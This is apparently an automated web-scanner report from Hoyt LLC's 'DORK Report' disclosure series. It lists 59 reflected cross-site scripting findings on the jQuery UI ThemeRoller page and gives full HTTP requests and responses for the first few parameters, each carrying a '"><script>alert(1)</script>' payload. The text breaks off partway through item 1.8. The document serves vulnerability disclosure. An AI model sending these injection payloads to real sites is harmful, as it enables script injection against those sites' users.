Current Research | Full Disclosure | As of March 14, 2011

Plesk SMB 10.2.0 Windows - Site Editor | Full Disclosure
Plesk Small Business Manager 10.2.0 for Windows | Full Disclosure
Hoyt LLC Research | Full Disclosure Report on Stored XSS in SmarterMail 8.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterStats 6.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterMail 7.x Series
Report generated by Hoyt LLC at Fri Nov 19 17:35:54 CST 2010.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://jqueryui.com/themeroller/ [bgColorActive parameter]

1.2. http://jqueryui.com/themeroller/ [bgColorContent parameter]

1.3. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

1.4. http://jqueryui.com/themeroller/ [bgColorError parameter]

1.5. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

1.6. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

1.7. http://jqueryui.com/themeroller/ [bgColorHover parameter]

1.8. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

1.9. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

1.10. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

1.11. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

1.12. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

1.13. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

1.14. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

1.15. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

1.16. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

1.17. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

1.18. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

1.19. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

1.20. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

1.21. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

1.22. http://jqueryui.com/themeroller/ [bgTextureError parameter]

1.23. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

1.24. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

1.25. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

1.26. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

1.27. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

1.28. http://jqueryui.com/themeroller/ [borderColorActive parameter]

1.29. http://jqueryui.com/themeroller/ [borderColorContent parameter]

1.30. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

1.31. http://jqueryui.com/themeroller/ [borderColorError parameter]

1.32. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

1.33. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

1.34. http://jqueryui.com/themeroller/ [borderColorHover parameter]

1.35. http://jqueryui.com/themeroller/ [cornerRadius parameter]

1.36. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

1.37. http://jqueryui.com/themeroller/ [fcActive parameter]

1.38. http://jqueryui.com/themeroller/ [fcContent parameter]

1.39. http://jqueryui.com/themeroller/ [fcDefault parameter]

1.40. http://jqueryui.com/themeroller/ [fcError parameter]

1.41. http://jqueryui.com/themeroller/ [fcHeader parameter]

1.42. http://jqueryui.com/themeroller/ [fcHighlight parameter]

1.43. http://jqueryui.com/themeroller/ [fcHover parameter]

1.44. http://jqueryui.com/themeroller/ [ffDefault parameter]

1.45. http://jqueryui.com/themeroller/ [fsDefault parameter]

1.46. http://jqueryui.com/themeroller/ [fwDefault parameter]

1.47. http://jqueryui.com/themeroller/ [iconColorActive parameter]

1.48. http://jqueryui.com/themeroller/ [iconColorContent parameter]

1.49. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

1.50. http://jqueryui.com/themeroller/ [iconColorError parameter]

1.51. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

1.52. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

1.53. http://jqueryui.com/themeroller/ [iconColorHover parameter]

1.54. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

1.55. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

1.56. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

1.57. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

1.58. http://jqueryui.com/themeroller/ [opacityShadow parameter]

1.59. http://jqueryui.com/themeroller/ [thicknessShadow parameter]



1. Cross-site scripting (reflected)
There are 59 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://jqueryui.com/themeroller/ [bgColorActive parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9362f"><script>alert(1)</script>7fddcf07157 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff9362f"><script>alert(1)</script>7fddcf07157&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ult=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff9362f"><script>alert(1)</script>7fddcf07157&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&border
...[SNIP]...

1.2. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12ef6"><script>alert(1)</script>d355649fe6d was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff12ef6"><script>alert(1)</script>d355649fe6d&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
mal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff12ef6"><script>alert(1)</script>d355649fe6d&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderCo
...[SNIP]...

1.3. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b213"><script>alert(1)</script>37764a8a11e was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e61b213"><script>alert(1)</script>37764a8a11e&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e61b213"><script>alert(1)</script>37764a8a11e&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHo
...[SNIP]...

1.4. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e9c"><script>alert(1)</script>31802c83066 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef167e9c"><script>alert(1)</script>31802c83066&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
12121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef167e9c"><script>alert(1)</script>31802c83066&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&
...[SNIP]...

1.5. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20197"><script>alert(1)</script>6c15c17f767 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c820197"><script>alert(1)</script>6c15c17f767&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ink rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c820197"><script>alert(1)</script>6c15c17f767&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&bord
...[SNIP]...

1.6. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e08a"><script>alert(1)</script>a833aec8e23 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea2e08a"><script>alert(1)</script>a833aec8e23&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
99999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea2e08a"><script>alert(1)</script>a833aec8e23&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&bor
...[SNIP]...

1.7. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0f91"><script>alert(1)</script>76251dd2dbe was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadad0f91"><script>alert(1)</script>76251dd2dbe&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadad0f91"><script>alert(1)</script>76251dd2dbe&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aa
...[SNIP]...

1.8. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c0c"><script>alert(1)</script>392fcb08d71 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa52c0c"><script>alert(1)</script>392fcb